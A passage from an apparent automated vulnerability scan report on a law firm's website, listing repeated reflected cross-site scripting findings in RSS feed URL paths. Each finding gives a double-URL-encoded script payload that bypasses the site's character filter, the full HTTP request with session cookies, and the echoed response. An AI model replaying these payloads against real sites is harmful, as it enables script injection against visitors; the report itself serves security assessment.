2.203. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices4a669"><script>alert(1)</script>6384682ca38/Postal/rss.xml" value="">
...[SNIP]...

2.204. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postale6c53"><script>alert(1)</script>2206f6e398b/rss.xml" value="">
...[SNIP]...

2.205. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postal/rss.xml5a1f6"><script>alert(1)</script>af2258d21b7" value="">
...[SNIP]...

2.206. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss35e2f"><script>alert(1)</script>69c57b225b/practices/Privacy/rss.xml" value="">
...[SNIP]...

2.207. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices38e63"><script>alert(1)</script>99d2689ecdb/Privacy/rss.xml" value="">
...[SNIP]...

2.208. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy5a06f"><script>alert(1)</script>ae4d6666dc0/rss.xml" value="">
...[SNIP]...

2.209. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy/rss.xml4256c"><script>alert(1)</script>823dd7739be" value="">
...[SNIP]...

2.210. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssab6ad"><script>alert(1)</script>3058a7872f/practices/Professional_Liability/rss.xml" value="">
...[SNIP]...

2.211. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb635c"><script>alert(1)</script>bb61d6adb13/Professional_Liability/rss.xml" value="">
...[SNIP]...

2.212. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability7b62f"><script>alert(1)</script>209c75ecebf/rss.xml" value="">
...[SNIP]...

2.213. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability/rss.xmla3cc2"><script>alert(1)</script>842ba8b7f27" value="">
...[SNIP]...

2.214. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss43538"><script>alert(1)</script>239e5feec7/practices/Public_Policy/rss.xml" value="">
...[SNIP]...

2.215. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices95bab"><script>alert(1)</script>4f44ea70a80/Public_Policy/rss.xml" value="">
...[SNIP]...

2.216. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policybf26f"><script>alert(1)</script>e7d3032f123/rss.xml" value="">
...[SNIP]...

2.217. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
